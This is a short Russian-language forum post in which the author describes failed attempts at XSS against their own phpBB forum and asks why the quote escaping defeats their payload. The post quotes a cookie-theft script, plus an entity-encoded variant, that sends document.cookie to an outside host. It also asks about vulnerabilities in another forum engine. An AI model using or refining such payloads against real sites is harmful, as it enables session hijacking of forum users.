Решил попробовать взломать свой форум на phpBB с помощью xss-уязвимости (для sql-баги, нужно чтобы была возможность пересылать приваты, а это есть не везде). Долго мучался, но так нефига и не получилось. Если вводить так(брал любую описанную xss-багу):<script&gt;document.location=&quot;http://www.asd.as/as.php?xack=&quot;+docu...lt;/script&gt;, то скрипт добавляет слеши перед каждой ковычкой. А если так (в 10'ой кодировке):<script&gt;document.location&a mp;#61&amp;#34www.asd.as/as.php?xack&amp;#61&amp;#34&amp;#43document.cookie &lt;/script&gt;, то строка выполняется только до &quot;<script&gt;document.location=&quot; и соответственно нарушается синтаксиc штмл, и весь остальной код не воспроизводится. Объясните где логика?
PS Кто нибудь слышал про движок textus? Есть ли там уязвимости?